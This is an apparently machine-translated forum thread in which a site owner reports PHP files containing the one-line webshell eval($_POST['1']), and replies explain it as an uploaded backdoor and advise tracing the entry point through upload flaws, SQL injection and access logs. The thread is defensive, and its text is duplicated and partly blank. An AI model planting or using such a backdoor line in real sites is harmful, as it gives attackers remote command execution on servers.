Web site A few php files, eval ($_post[' 1 ']);

The website has a few more PHP, the content is as follows: eval ($_post[' 1 ']);

Some of the other content, I Baidu a bit when the discovery of the execution of certain commands, I tested a bit if the permissions are not limited enough, you can actually execute some commands. In addition to setting permissions, can I restrict it from the code level? Is there any good way to do it?

There is also a PHP file content as follows:

There are documents, the name is: 13686921256303.virus_killed
The content is:

Thank you for your attention, please.

Reply content:

The website has a few more PHP, the content is as follows: eval ($_post[' 1 ']);

Some of the other content, I Baidu a bit when the discovery of the execution of certain commands, I tested a bit if the permissions are not limited enough, you can actually execute some commands. In addition to setting permissions, can I restrict it from the code level? Is there any good way to do it?

There is also a PHP file content as follows:

There are documents, the name is: 13686921256303.virus_killed
The content is:

Thank you for your attention, please.

Obviously is to be uploaded a word Trojan! can be directly connected through the kitchen knife, you can execute a lot of commands. Fix the words to fundamentally repair, to see if the site is not an upload vulnerability, SQL injection and other issues. You can view the HTTP access logs to see what you have done with this sentence, to troubleshoot whether the site is being raised, to get server permissions, and so on.

Fix to fix the root.

Instead of bothering to let the virus code "not run," it is better to look for the source of the virus's entry-whether it was introduced from a bug in the PHP program or from an unsafe server environment.

In addition, using a virtual host may not be a good idea for security. Because you share the physical device and the lamp environment without isolation, although theoretically the isolation between the users of Linux is good, but actually not isolated or high risk.

This is the PHP back door open.

